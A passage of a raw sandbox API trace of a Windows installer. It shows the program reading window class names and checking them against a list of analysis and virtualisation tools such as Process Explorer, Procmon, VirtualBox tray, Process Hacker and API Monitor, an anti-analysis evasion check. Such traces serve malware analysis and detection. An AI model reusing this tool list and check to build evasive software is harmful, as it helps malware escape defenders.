lpString1=0x430000, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.590] lstrcpynA (in: lpString1=0x42e3a0, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.590] lstrlenA (lpString="callback1") returned 9 [0158.590] lstrcpynA (in: lpString1=0x40ac18, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.590] lstrcpynA (in: lpString1=0x40b018, lpString2="callback1", iMaxLength=1024 | out: lpString1="callback1") returned="callback1" [0158.590] lstrcmpiA (lpString1="callback1", lpString2="callback1") returned 0 [0158.590] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.590] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.591] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.591] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.591] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.591] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.591] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.591] lstrcpynA (in: lpString1=0x33723c, lpString2="user32::GetWindowText(p r1, t.r2, i1024)", iMaxLength=1024 | out: lpString1="user32::GetWindowText(p r1, t.r2, i1024)") returned="user32::GetWindowText(p r1, t.r2, i1024)" [0158.591] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.591] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.591] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.591] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.591] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.591] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.591] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.591] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.592] lstrcpynA (in: lpString1=0x341200, lpString2="65698", iMaxLength=1024 | out: lpString1="65698") returned="65698" [0158.592] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.592] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.592] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.592] GetWindowTextA (in: hWnd=0x100a2, lpString=0x340df8, nMaxCount=1024 | out: lpString="") returned 0 [0158.592] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="1024") returned 4 [0158.592] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.592] lstrcpyA (in: lpString1=0x430800, lpString2="" | out: lpString1="") returned="" [0158.592] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="65698") returned 5 [0158.592] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.592] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.592] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.592] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.592] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.592] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.592] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.593] lstrcpynA (in: lpString1=0x33723c, lpString2="user32::GetClassName(p r1, t.r3, i1024)", iMaxLength=1024 | out: lpString1="user32::GetClassName(p r1, t.r3, i1024)") returned="user32::GetClassName(p r1, t.r3, i1024)" [0158.593] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.593] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.593] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.593] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.593] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.593] lstrcpyA (in: lpString1=0x340df8, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.593] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.593] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.593] lstrcpynA (in: lpString1=0x340df8, lpString2="65698", iMaxLength=1024 | out: lpString1="65698") returned="65698" [0158.593] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.593] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.593] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.594] GetClassNameA (in: hWnd=0x100a2, lpClassName=0x3401e0, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0158.594] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="1024") returned 4 [0158.594] lstrcpynA (in: lpString1=0x341200, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.594] lstrcpyA (in: lpString1=0x430c00, lpString2="tooltips_class32" | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.594] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="65698") returned 5 [0158.594] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.594] lstrlenA (lpString="0") returned 1 [0158.594] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.594] lstrlenA (lpString="tooltips_class32") returned 16 [0158.594] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.594] lstrcpynA (in: lpString1=0x40b018, lpString2="PROCEXPL", iMaxLength=1024 | out: lpString1="PROCEXPL") returned="PROCEXPL" [0158.594] lstrcmpiA (lpString1="tooltips_class32", lpString2="PROCEXPL") returned 1 [0158.594] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.594] lstrlenA (lpString="tooltips_class32") returned 16 [0158.594] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.594] lstrcpynA (in: lpString1=0x40b018, lpString2="PROCMON_WINDOW_CLASS", iMaxLength=1024 | out: lpString1="PROCMON_WINDOW_CLASS") returned="PROCMON_WINDOW_CLASS" [0158.594] lstrcmpiA (lpString1="tooltips_class32", lpString2="PROCMON_WINDOW_CLASS") returned 1 [0158.594] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.594] lstrlenA (lpString="tooltips_class32") returned 16 [0158.594] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.594] lstrcpynA (in: lpString1=0x40b018, lpString2="VBoxTrayToolWndClass", iMaxLength=1024 | out: lpString1="VBoxTrayToolWndClass") returned="VBoxTrayToolWndClass" [0158.594] lstrcmpiA (lpString1="tooltips_class32", lpString2="VBoxTrayToolWndClass") returned -1 [0158.594] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.594] lstrlenA (lpString="tooltips_class32") returned 16 [0158.594] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.594] lstrcpynA (in: lpString1=0x40b018, lpString2="VMSwitchUserControlClass", iMaxLength=1024 | out: lpString1="VMSwitchUserControlClass") returned="VMSwitchUserControlClass" [0158.594] lstrcmpiA (lpString1="tooltips_class32", lpString2="VMSwitchUserControlClass") returned -1 [0158.594] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.594] lstrlenA (lpString="tooltips_class32") returned 16 [0158.594] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.595] lstrcpynA (in: lpString1=0x40b018, lpString2="ProcessLasso_Notification_Class", iMaxLength=1024 | out: lpString1="ProcessLasso_Notification_Class") returned="ProcessLasso_Notification_Class" [0158.595] lstrcmpiA (lpString1="tooltips_class32", lpString2="ProcessLasso_Notification_Class") returned 1 [0158.595] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.595] lstrlenA (lpString="tooltips_class32") returned 16 [0158.595] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.595] lstrcpynA (in: lpString1=0x40b018, lpString2="SmartSniff", iMaxLength=1024 | out: lpString1="SmartSniff") returned="SmartSniff" [0158.595] lstrcmpiA (lpString1="tooltips_class32", lpString2="SmartSniff") returned 1 [0158.595] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.595] lstrlenA (lpString="tooltips_class32") returned 16 [0158.595] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.595] lstrcpynA (in: lpString1=0x40b018, lpString2="ProcessHacker", iMaxLength=1024 | out: lpString1="ProcessHacker") returned="ProcessHacker" [0158.595] lstrcmpiA (lpString1="tooltips_class32", lpString2="ProcessHacker") returned 1 [0158.595] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.595] lstrlenA (lpString="tooltips_class32") returned 16 [0158.595] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.595] lstrcpynA (in: lpString1=0x40b018, lpString2="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}", iMaxLength=1024 | out: lpString1="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}") returned="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}" [0158.595] lstrcmpiA (lpString1="tooltips_class32", lpString2="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}") returned 1 [0158.595] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.595] lstrlenA (lpString="tooltips_class32") returned 16 [0158.595] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.595] lstrcpynA (in: lpString1=0x40b018, lpString2="SysAnalyzer", iMaxLength=1024 | out: lpString1="SysAnalyzer") returned="SysAnalyzer" [0158.595] lstrcmpiA (lpString1="tooltips_class32", lpString2="SysAnalyzer") returned 1 [0158.595] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.595] lstrlenA (lpString="tooltips_class32") returned 16 [0158.595] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.595] lstrcpynA (in: lpString1=0x40b018, lpString2="VMSwitchUserControlClass", iMaxLength=1024 | out: lpString1="VMSwitchUserControlClass") returned="VMSwitchUserControlClass" [0158.595] lstrcmpiA (lpString1="tooltips_class32", lpString2="VMSwitchUserControlClass") returned -1 [0158.595] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.595] lstrlenA (lpString="tooltips_class32") returned 16 [0158.595] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.595] lstrcpynA (in: lpString1=0x40b018, lpString2="ProcessHacker", iMaxLength=1024 | out: lpString1="ProcessHacker") returned="ProcessHacker" [0158.595] lstrcmpiA (lpString1="tooltips_class32", lpString2="ProcessHacker") returned 1 [0158.595] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.595] lstrlenA (lpString="") returned 0 [0158.595] lstrcpynA (in: lpString1=0x40ac18, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.596] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.596] lstrcmpiA (lpString1="", lpString2="0") returned -1 [0158.596] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.596] lstrlenA (lpString="") returned 0 [0158.596] lstrcpynA (in: lpString1=0x33723c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.596] lstrcpynA (in: lpString1=0x337684, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.596] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.596] lstrlenA (lpString="3399936") returned 7 [0158.596] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.596] lstrcpynA (in: lpString1=0x40a418, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.596] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.596] lstrcpynA (in: lpString1=0x337acc, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.596] lstrcpynA (in: lpString1=0x432800, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.596] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.596] lstrcpynA (in: lpString1=0x33723c, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.596] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.596] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.596] lstrlenA (lpString="") returned 0 [0158.596] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.596] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.596] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.596] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.596] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.596] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.597] lstrlenA (lpString="") returned 0 [0158.597] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.597] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.597] lstrlenA (lpString="") returned 0 [0158.597] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.597] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.597] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.597] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.597] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.597] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.597] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.597] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.597] lstrcpynA (in: lpString1=0x33835c, lpString2="ntdll::strstr(t R1, t R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.597] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.597] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.597] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.598] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.598] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.598] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.598] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.598] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.598] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.598] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.598] lstrcpynA (in: lpString1=0x3401e0, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.598] lstrcpynA (in: lpString1=0x340df8, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.598] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.598] strstr (_Str="", _SubStr="- main thread") returned 0x0 [0158.600] lstrcpynA (in: lpString1=0x3401e0, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.600] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.600] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.600] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.600] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.600] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.600] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.600] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.600] lstrlenA (lpString="0") returned 1 [0158.600] lstrcpynA (in: lpString1=0x337684, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.600] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.600] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.600] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.600] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.600] lstrcpynA (in: lpString1=0x430000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.601] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.601] lstrlenA (lpString="0") returned 1 [0158.601] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.601] lstrlenA (lpString="") returned 0 [0158.601] lstrcpynA (in: lpString1=0x33723c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.601] lstrcpynA (in: lpString1=0x337684, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.601] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.601] lstrlenA (lpString="3399936") returned 7 [0158.601] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.601] lstrcpynA (in: lpString1=0x40a418, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.601] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.601] lstrcpynA (in: lpString1=0x337acc, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.601] lstrcpynA (in: lpString1=0x432800, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.601] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.601] lstrcpynA (in: lpString1=0x33723c, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.601] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.601] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.601] lstrlenA (lpString="") returned 0 [0158.601] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.601] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.601] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.601] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.601] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.601] lstrcpynA 